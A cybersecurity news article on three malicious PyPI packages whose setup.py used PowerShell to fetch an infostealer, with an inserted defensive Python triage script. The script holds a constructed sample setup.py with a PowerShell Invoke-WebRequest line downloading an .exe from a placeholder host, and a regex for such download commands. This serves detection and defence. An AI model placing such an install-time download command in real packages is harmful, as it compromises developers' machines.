Programmers: look out for these infostealers on the Python Package Index

Three packages were seen delivering infostealers


Three malicious packages carrying infostealers were recently discovered, and subsequently removed, from the PyPI repository.

Researchers from Fortinet found three packages, uploaded between January 7 and 12, by a user named “Lollip0p”. These three are called “colorslib”, “httpslib”, and “libhttps”, and if you’ve used them before, make sure to remove them immediately.

Usually, cybercriminals looking to compromise Python developer endpoints via PyPI will try typosquatting - giving their malicious packages names almost identical to those of legitimate projects. That way, developers who are either reckless or in a hurry might unknowingly install the malicious one instead of the clean one.

Stealing browser data


This campaign, however, is different, as these three have unique names. To build trust, the attacker drafted complete descriptions for the packages. While the total download count for these three hardly surpassed 500, it might still prove devastating if it’s a part of a larger supply chain, the publication states.

In all three cases, the attackers are distributing a file called “setup.py” which, after launching PowerShell, tries to download the “Oxyz.exe” executable from the internet. This executable, the researchers say, is malicious and steals browser information. We don’t know exactly what type of information the malware is looking to steal, but infostealers usually go for saved passwords, credit card data, cryptocurrency wallets, and other valuable information.
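As an added example (not code from the article or from Fortinet's report), a defender-side triage script: it checks the current Python environment for the three reported package names and statically scans a setup.py for shell or process calls whose arguments look like a PowerShell-based download. The sample setup.py and the example.invalid URL are constructed for the demonstration.

```python
"""Triage helpers for the PyPI infostealer campaign described above (added example)."""
import ast
import re
from importlib import metadata

# Package names reported by Fortinet, as quoted in the article.
REPORTED_PACKAGES = {"colorslib", "httpslib", "libhttps"}

# Functions that hand a command to a shell or spawn a process at install time.
EXEC_CALLS = {"system", "popen", "run", "Popen", "call", "check_output", "check_call"}
# String content that suggests a PowerShell download of an executable.
DOWNLOAD_HINT = re.compile(r"powershell|Invoke-WebRequest|DownloadFile|\.exe\b|https?://", re.I)


def installed_reported_packages():
    """Return the reported package names that are installed in this environment."""
    names = {d.metadata["Name"].lower() for d in metadata.distributions() if d.metadata["Name"]}
    return sorted(REPORTED_PACKAGES & names)


def suspicious_setup_calls(source):
    """Statically scan setup.py source without executing it.

    Returns (lineno, reason) for each shell/process call whose literal string
    arguments match DOWNLOAD_HINT."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", None)
        if name not in EXEC_CALLS:
            continue
        # Collect every string literal nested under the call's arguments.
        literals = [c.value for a in node.args + [k.value for k in node.keywords]
                    for c in ast.walk(a) if isinstance(c, ast.Constant) and isinstance(c.value, str)]
        hits = [lit for lit in literals if DOWNLOAD_HINT.search(lit)]
        if hits:
            findings.append((node.lineno, f"{name}() with {hits[0]!r}"))
    return findings


# Constructed sample modelled on the behaviour the article describes; not the real file.
SAMPLE_SETUP = '''
from setuptools import setup
import subprocess
subprocess.run(["powershell", "-c", "Invoke-WebRequest http://example.invalid/Oxyz.exe -OutFile x.exe"])
setup(name="colorslib", version="0.1")
'''

if __name__ == "__main__":
    print("installed reported packages:", installed_reported_packages())
    for lineno, reason in suspicious_setup_calls(SAMPLE_SETUP):
        print(f"line {lineno}: {reason}")
```

Run the scanner over an unpacked sdist before installing it; a clean setup.py yields no findings.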


The report also found that the detection rate for these executables is relatively low (up to 13.5%), meaning the attackers can successfully siphon out data even from endpoints protected by antivirus solutions.

While the malicious packages have been removed from PyPI already, nothing is stopping the attackers from simply uploading them with a different name, and from a different account. That being said, the best way to protect against this type of supply chain attack is to be particularly careful when downloading code building blocks from repositories.


Via: BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
